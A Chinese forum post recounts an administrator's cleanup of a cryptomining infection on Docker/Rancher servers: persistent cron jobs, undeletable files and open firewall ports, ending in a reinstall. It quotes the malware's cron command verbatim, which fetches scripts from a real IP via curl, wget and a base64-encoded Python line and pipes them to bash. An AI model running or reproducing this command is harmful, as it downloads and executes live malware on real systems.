好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 fht000 于 2020-11-11 19:32 编辑
上个月接手了几台服务器,上面主要是部署了一套springcloud服务,用了docker镜像部署,使用rancher管理服务器和容器.
接手几天后发现页面访问越来越卡,直到有一天直接404了,上服务器上排查,发现rancher已经停止,服务器上还一直报你有一条邮件的消息,不过是英文的,再次排查后发现CPU和内存大量占用.
执行top命令总算发现了这个东西.....
如果没猜错,这个应该就是所谓的挖矿程序了!
[url=]好吧,本以为找到了以后就好处理了,接下来就去找找它再哪里......[/url]
这个貌似显示已经是被删除的,没遇到过,找度娘吧.....
经过一同照搬操作发现好多地方都有这个东西下过来的定时任务脚本
打开这些文件之后发现都有定时任务执行......
本来想着,把定时任务执行一次(curl -s http://198.98.57.217/xmi||wget -q -O - http://198.98.57.217/xmi)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi,然后按照下载过来的脚本,查看下载过来的文件,然后一个个删除,结果却发现我root账户没有权限,[/url]chmod完全不起作用......
在百度查了几篇博客,如这个https://blog.csdn.net/deeplearnings/article/details/77367509,都说需要用chattr命令,然后好不容易删除,再去执行top命令,发现第一张图上的情况没到10秒钟又出现了,再去之前查到脚本文件并删除的地方看.一切被删文件恢复原样,然后就是心态快炸的过程......
最后到查看防火墙和iptables发现所有端口对外开放......
没办法只好用最野蛮的办法了,备份数据库重装系统,配置ip白名单规则,这个世界总算清净了!!!
本来还想附上执行定时任务命令后执行命令行文件一份,有兴趣的童鞋可以看看,结果发现传不上来
结语:新人第一次发帖,文笔不好,请多包涵 ,服务器还是要提前配置安全规则,亡羊补牢就太晚了!不过我是接受被人的,这样的事情没法杜绝了...
谢谢各位,帖子图片以及改过来了 |
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
[复制链接]
发表于 2020-11-11 18:36
发表于 2020-11-11 18:59
|
发表于 2020-11-11 19:04
